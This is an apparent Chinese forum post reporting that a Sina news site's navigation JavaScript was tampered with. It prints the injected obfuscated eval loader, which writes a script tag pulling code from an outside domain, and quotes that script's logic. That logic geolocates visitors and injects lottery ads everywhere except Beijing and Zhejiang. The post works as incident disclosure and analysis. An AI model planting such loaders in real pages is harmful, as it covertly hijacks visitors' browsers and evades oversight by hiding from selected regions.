目测新浪的一个 js 被替换了,是内鬼还是被黑？

http://tech.sina.com.cn/it/2018-04-19/doc-ifzihnep8570976.shtml 原文链接在这

http://n.sinaimg.cn/common/channelnav/js/nav.js 被替换的 js 在这

被增加的代码在这

eval(function(d,f,a,c,b,e){b=function(a){return a.toString(f)};if(!“”.replace(/^/,String)){for(;a–;)e[b(a)]=c[a]||b(a);c=[function(a){return e[a]}];b=function(){return“\\w+”};a=1}for(;a–;)c[a]&&(d=d.replace(new RegExp(“\\b”+b(a)+“\\b”,“g”),c[a]));return d}(‘2.8(“<0 3=\\”4\\” 5=\\”6/7\\” 1=\\”9\\” a=\\”b://c.d/e/f.g\\” </0 “);’,17,17,“script charset document id wf type text javascript writeln gb2312 src https sohu999 com imgs sina js“.split(” “),0,{}));

是被劫持的理由是广告跳转域名没有备案，也查不到是谁注册的，显示代理注册

sohu999…com 显示 DNS server 是 DNS pod emmm [:doge:]

https://sohu999.com/imgs/sina.js “` javascript loadScript(‘https://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js‘, function() { if (window.remote_ip_info.province == ‘北京’ || window.remote_ip_info.province == ‘浙江’) { return false } else { // 注入广告… } ) “`

JS 已经内容已经被修改为 11111111111111111111111111111111111111111111 了

关于怎么发现的，因为安装了 ABP，习惯了没有广告的世界突然发现有个广告，然后还是彩票的，然后想了解到底是什么广告，然后就发现有点不对。。。

貌似现在变成111了 这个可能是内鬼所为了！